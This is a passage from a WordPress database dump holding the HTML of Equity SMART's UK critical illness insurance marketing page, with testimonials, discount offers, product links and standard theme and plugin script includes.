	<div class=\"wpb_wrapper\">&#13;\n			&#13;\n			&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 <div class=\"wpb_call_to_action wpb_content_element clearfix cta_align_right\"><a class=\"wpb_button_a\" href=\"http://www.equalitywalk.org.uk/Critical_Illness_Cover_Comparison_Report.pdf\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'download\',\'http://www.equalitywalk.org.uk/Critical_Illness_Cover_Comparison_Report.pdf\']);\" target=\"_blank\"><span class=\"wpb_button  wpb_btn-success wpb_btn-large wpb_chart\">See Sample Report <i class=\"icon\"> </i></span></a><h2 class=\"wpb_call_text\">If you’re considering critical illness insurance for you and your family, our free report is not an option – it’s essential!</h2></div> &#13;\n &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p style=\"text-align: center;\"><span style=\"color: #7d7d7d; font-family: tahoma,geneva,sans-serif; font-size: x-large;\"><b>Here’s How Our Advice Puts You In The Driving Seat</b></span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span4 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Independent</span></p>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\"> We give you an unbiased assessment of all insurance plans through best practice to ensure you are not mis-sold a financial product</span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span4 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\"><b>Research Process</b></span></p>&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\"> We’ll pinpoint with watchmakers precision the plans that provide you with the best probability of a payout.</span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span4 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\"><b>You Save Money</b></span></p>&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\"> Reduce your premiums through our advice-based discounts so you achieve the best cover at the most economical cost.</span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span4 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Medical Disclosures </span></p>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Pre or existing medical conditions can affect your premiums &amp; coverage, so we ensure nothing’s missed that could leave you and your family penniless.</span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span4 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Reduced Admin &amp; Time Hassles</span></p>&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\"> By getting it right first time we ensure that the hard work is done by us, not you. You’ll feel safe in the knowledge that your insurance needs are all being expertly handled</span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span4 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p>Not on Price Comparison Sites </p>&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">You simply cannot get this level of service, knowledge, expertise and detailed reporting that is accurate and transparent through a price comparison site.</span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 <div class=\"wpb_call_to_action wpb_content_element clearfix cta_align_bottom\"><h2 class=\"wpb_call_text\">So if you agree that knowing more isn\'t a bad thing when it comes to your insurance, click the button below to get in touch and get your FREE report.</h2><a class=\"wpb_button_a\" href=\"../contact-us/\"><span class=\"wpb_button  wpb_btn-danger wpb_btn-large\">Contact Us Today</span></a></div> &#13;\n &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p style=\"text-align: center;\"><span style=\"color: #777777;\"><span style=\"font-family: tahoma,geneva,sans-serif; font-size: x-large;\">Kind Words &amp; Praise</span></span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span4 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div class=\"simple-green-box\" style=\"margin: 5px auto 20px; width: 70%;\">&#13;\n<p>Its a very comprehensive report indeed. As a tool, I like it, it’s easy to compare and the contrast is quite evident, plus I can see very easily just how much better the new policy is. I certainly appreciate seeing it all the way down to the fine detail. So would give it a thumbs up.<b> </b></p>&#13;\n<p><b>Dr Hanson</b></p>&#13;\n</div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span4 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div class=\"simple-green-box\" style=\"margin: 5px auto 20px; width: 70%;\">&#13;\n<p>I have never received such courteous and personalised service from anybody – let alone a financial advisor. Sam’s knowledge and patience is exceptional and goes way beyond the call of professional duty. Fantastic organisation with warmth and great service.<b> </b></p>&#13;\n<p><b> Dr Vishwas Shetty</b></p>&#13;\n</div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span4 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div class=\"simple-green-box\" style=\"margin: 5px auto 20px; width: 70%;\">&#13;\n<p>I was impressed with Sam’s knowledge of the length and breadth of products offered in the UK market, good understanding of the fine prints and ability to offer the product that best suited my personal needs.  He was professional throughout and commercially very competitive.  Brij Agarwal Project Manager Barclays Bank</p>&#13;\n</div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 <div class=\"wpb_separator wpb_content_element \"/>&#13;\n &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span8 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif; font-size: large;\"><span style=\"color: #99cc00;\">A Word From the Company</span></span></p>&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif;\">If you become a client, we promise that you will benefit. If you leave with only with our knowledge, you will still be better off. Simple.</span></p>&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif;\">Much of what we say is common sense, but very little of what we do is common practice. That’s what sets us apart from price comparison sites and puts us head and shoulders above the competition.</span></p>&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif;\">We’ll help you to take the protection of you and your family to the next level today and give you the chance to enjoy the feeling of no pressure, no fuss, no rush. Just better, smarter, simpler and faster insurance solutions</span></p>&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif;\">We’re changing things for the better when it comes to insuring you and the ones you love.</span></p>&#13;\n<p>Warmest Regards</p>&#13;\n<p>  Head of Life &amp; Health Insurance </p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span4 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 <div class=\"wpb_call_to_action wpb_content_element clearfix cta_align_bottom\"><h2 class=\"wpb_call_text\">So if you agree that knowing more isn\'t a bad thing when it comes to your insurance, click the button below to get in touch and get your FREE report.</h2><a class=\"wpb_button_a\" href=\"../contact-us/\"><span class=\"wpb_button  wpb_wpb_button wpb_btn-large\">Contact Us</span></a></div> &#13;\n &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p/>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_tabs wpb_content_element \" data-interval=\"0\">&#13;\n		<div class=\"wpb_wrapper wpb_tour_tabs_wrapper ui-tabs clearfix\">&#13;\n			<ul class=\"clearfix ui-tabs-nav\"><li><a href=\"#tab-1366030210-1-65\">Get your FREE critical illness insurance report</a></li><li><a href=\"#tab-1366030210-2-69\">We Guarantee to Make Things Better! Here’s How:</a></li><li><a href=\"#tab-1366030254919-3-10\">Our Advice Promise</a></li></ul><div id=\"tab-1366030210-1-65\" class=\"wpb_tab wpb_row vc_row-fluid ui-tabs-panel wpb_ui-tabs-hide clearfix\">&#13;\n				 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div>&#13;\n<p>Get your FREE critical illness insurance report – but not before you read this:</p>&#13;\n<p>Have you been on a few websites for a simple insurance price comparison, but been left confused with all the complicated small print, medical terms and conditions covered? It can make matters worse when you see that each insurer has slightly varied terms for paying out at claim.</p>&#13;\n<p>Don’t worry any longer. Our aim is to give you more certainty in selecting the insurer that gives you the best overall coverage and price.</p>&#13;\n<p><b>We’re changing things for the better – for you.</b></p>&#13;\n<p> </p>&#13;\n<h3 style=\"text-align: center;\">Click on the button to get your FREE critical illness report today!&#13;\n</h3><p style=\"text-align: center;\">[ez_big_btn color=\"green\" url=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"_self\" circle=\"yes\"]Request A Free Report Today![/ez_big_btn]</p>&#13;\n</div>&#13;\n<div/>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n			</div>  &#13;\n			<div id=\"tab-1366030210-2-69\" class=\"wpb_tab wpb_row vc_row-fluid ui-tabs-panel wpb_ui-tabs-hide clearfix\">&#13;\n				 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div>&#13;\n<div>&#13;\n<p><b>We Guarantee to Make Things Better! Here’s How:</b></p>&#13;\n<p>When you call today we’ll<b> </b>provide you with a 10% discount on your insurance premiums anytime you should decide to buy insurance from us.</p>&#13;\n<p>Not only that, but we will evaluate any insurance you already have and look to beat the price or the small print definitions – potentially improving the probability of a successful claim.</p>&#13;\n<p>And if, after all our best efforts we can’t manage to achieve the above, we will give you a £50.00 Amazon gift voucher for you to spend as you wish.</p>&#13;\n<p><b>We care about the details. We care about you.</b></p>&#13;\n<h3 style=\"text-align: center;\">&#13;\n<h3 style=\"text-align: center;\">Click on the button to get your FREE critical illness report today!&#13;\n</h3></h3><p style=\"text-align: center;\">[ez_big_btn color=\"green\" url=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"_self\" circle=\"yes\"]Request A Free Report Today![/ez_big_btn]</p>&#13;\n</div>&#13;\n</div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n			</div>  &#13;\n			<div id=\"tab-1366030254919-3-10\" class=\"wpb_tab wpb_row vc_row-fluid ui-tabs-panel wpb_ui-tabs-hide clearfix\">&#13;\n				 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div>&#13;\n<div>&#13;\n<div>&#13;\n<div>&#13;\n<p><b>Our Advice Promise</b></p>&#13;\n<p>If you become a client of Equity SMART, we promise that you will benefit. If you leave with only our knowledge, you will still be better off. Simple.</p>&#13;\n<p>Much of what we say is common sense, but very little of what we do is common practice. That’s what sets us apart from price comparison sites and puts us head and shoulders above the competition.</p>&#13;\n<p>We’ll help you to take the protection of you and your family to the next level today and give you the chance to enjoy the feeling of no pressure, no fuss, no rush. Just better, smarter, simpler and faster insurance solutions.</p>&#13;\n<p><b>Equity SMART. Protecting You and Those You Love.</b></p>&#13;\n<p> </p>&#13;\n<h3 style=\"text-align: center;\">Click on the button to get your FREE critical illness report today!&#13;\n</h3><p style=\"text-align: center;\">[ez_big_btn color=\"green\" url=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"_self\" circle=\"yes\"]Request A Free Report Today![/ez_big_btn]</p>&#13;\n</div>&#13;\n</div>&#13;\n</div>&#13;\n</div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n			</div>  &#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<h2 style=\"text-align: center;\"><span style=\"color: #99cc00;\"><span style=\"font-family: tahoma,geneva,sans-serif; font-size: x-large;\"> Checkout Our Other Insurance Pages</span><br/></span></h2>&#13;\n<p style=\"text-align: center;\"><img alt=\"\" src=\"../wp-content/plugins/InstaBuilder/images/graphics/arrow-3.png\" border=\"0\"/></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div class=\"rounded-brown-box\" style=\"margin: 5px auto 20px; width: 85%;\">&#13;\n<p style=\"text-align: center;\"><a href=\"#\"/></p>&#13;\n<h2 style=\"text-align: center;\"><span style=\"color: #99cc00; font-size: medium;\"> </span><span style=\"color: #99cc00;\"><span style=\"font-family: tahoma, geneva, sans-serif;\"> Life     Insurance</span></span></h2>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #ffffff; font-family: tahoma,geneva,sans-serif; font-size: small;\">Enabling you to and care for and protect your loved ones even after you’ve gone </span></p>&#13;\n<p style=\"text-align: center;\"> <span style=\"font-family: tahoma,geneva,sans-serif;\"><a class=\"wpb_button_a\" href=\"../contact-us/\"><span class=\"wpb_button  wpb_btn-danger wpb_btn-large\">Learn More</span></a></span></p>&#13;\n</div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div class=\"rounded-brown-box\" style=\"margin: 5px auto 20px; width: 85%;\">&#13;\n<p style=\"text-align: center;\"><a href=\"#\"/></p>&#13;\n<h2 style=\"text-align: center;\"><span style=\"color: #99cc00; font-family: tahoma, geneva, sans-serif;\">Income Protection</span></h2>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">Even if you can’t work your salary needn’t suffer – nor should those who depend on it</span></p>&#13;\n<p style=\"text-align: center;\"><a class=\"wpb_button_a\" style=\"font-family: tahoma, geneva, sans-serif;\" href=\"../contact-us/\"><span class=\"wpb_button  wpb_btn-danger wpb_btn-large\">Learn More</span></a></p>&#13;\n</div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div class=\"rounded-brown-box\" style=\"margin: 5px auto 20px; width: 85%;\">&#13;\n<p style=\"text-align: center;\"><a href=\"#\"/></p>&#13;\n<h2 style=\"text-align: center;\"><span style=\"color: #99cc00; font-family: tahoma,geneva,sans-serif;\">Critical Illness Cover</span></h2>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #ffffff; font-family: tahoma,geneva,sans-serif; font-size: small;\">The right serious illness plan avoids critical financial problems for your family</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"font-family: tahoma,geneva,sans-serif;\"><a class=\"wpb_button_a\" href=\"../critical-illness-insurance-2-0/\"><span class=\"wpb_button  wpb_btn-danger wpb_btn-large\">Learn More</span></a></span></p>&#13;\n</div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div class=\"rounded-brown-box\" style=\"margin: 5px auto 20px; width: 80%;\">&#13;\n<p style=\"text-align: center;\"><a href=\"#\"/></p>&#13;\n<h2 style=\"text-align: center;\"><span style=\"color: #99cc00; font-family: tahoma, geneva, sans-serif;\">Business Protection</span></h2>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #ffffff; font-family: tahoma,geneva,sans-serif; font-size: small;\">Your key people <b>are</b> your business. Protect them, and watch your business grow…</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"font-family: tahoma,geneva,sans-serif;\"><a class=\"wpb_button_a\" href=\"../contact-us/\"><span class=\"wpb_button  wpb_btn-danger wpb_btn-large\">Learn More</span></a></span></p>&#13;\n</div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div>&#13;\n							</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"screen\"/><link rel=\"stylesheet\" id=\"ui-custom-theme-css\" href=\"../wp-content/plugins/js_composer/assets/ui-custom-theme/jquery-ui-less.custom.css\" type=\"text/css\" media=\"screen\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js_composer_front.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/jquery/ui/jquery.ui.core.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/jquery/ui/jquery.ui.widget.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/jquery/ui/jquery.ui.tabs.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/jquery-ui-tabs-rotate/jquery-ui-tabs-rotate.js\"/></body>','Critical Illness Insurance 2.0','Introducing the UK’s 1st solution designed for anyone who wants to avoid the common pitfalls when buying critical illness insurance. Our report makes life','publish','closed','closed','','critical-illness-insurance-2-0','','','2017-09-21 16:34:28','2017-09-21 16:34:28','',0,'http://www.equalitywalk.org.uk/critical-illness-insurance-2-0',0,'page','',0),(61,1,'2017-09-21 16:34:29','2017-09-21 16:34:29','<body class=\"page page-id-111 page-child parent-pageid-30 page-template page-template-side-navigation-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page 